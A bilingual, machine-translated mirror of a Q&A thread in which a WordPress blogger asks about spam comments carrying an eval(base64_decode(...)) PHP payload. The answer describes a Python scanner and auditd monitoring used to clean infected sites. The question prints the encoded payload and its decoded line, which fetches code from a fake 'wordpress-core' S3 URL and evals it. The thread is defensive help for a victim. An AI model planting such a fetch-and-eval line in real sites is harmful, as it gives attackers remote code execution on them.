EVAL Base64编码病毒的Word preSS [英] Eval Base64 virus Wordpress

问题描述

我用一个词preSS博客今天我得到了这样的评论。

I'm using a wordpress blog today i got a comment like this .

<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --&gt;<!--/mfunc-->

当我使用去codeR我得到过德codeD此评论

When i've decoded this comment using decoder i got

$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);

我收到很多这样的评论。谁能帮我解决这个问题？它是一个黑客或它表明黑客的开始？

I'm getting many comments like this . Can anyone help me to resolve this problem .? Is it a Hack or does it shows the beginning of hacking ?

推荐答案

的建议没有为我们工作。下面是我们如何删除多个字preSS网站的恶意code无需停机。

None of the suggestions worked for us. The following is how we removed malicious code from multiple wordpress sites without any downtime.

我们遇到了在那里我们有多个旧词preSS站点共享一个文件系统，是由该病毒渗透的问题。

We ran into a problem where we had multiple legacy wordpress sites sharing one filesystem that was infiltrated by this virus.

我们最后写一个小python脚本遍历文件系统我们并检测恶意code。

We ended up writing a little python script to traverse our filesystem and detect the malicious code.

这里的code兴趣的人（注：使用AT风险自负）：
https://github.com/michigan-com/eval_scrubber

Here's the code for anyone interested (NOTE: USE AT OWN RISK): https://github.com/michigan-com/eval_scrubber

pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .

这脚本将扫描文件系统中的恶意内容，并作为一个独立的命令，它会尝试删除的base64的eval函数。

That scripts will scan the filesystem for malicious content and as a separate command it will attempt to remove the base64 eval functions.

这确实是一个临时的解决方案，因为这种病毒的生成器使用PHP的意见导致正则表达式不匹配。我们结束了使用 auditd调用来监视哪些文件被写入我们知道在受感染的文件：的http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor what file is writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

一旦我们发现的病毒的产生，确实多了一个 eval_scrubber删除然后我们的问题是固定的。

Once we found the generator of the virus, did one more eval_scrubber remove and then our problem was fixed.

这篇关于EVAL Base64编码病毒的Word preSS的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！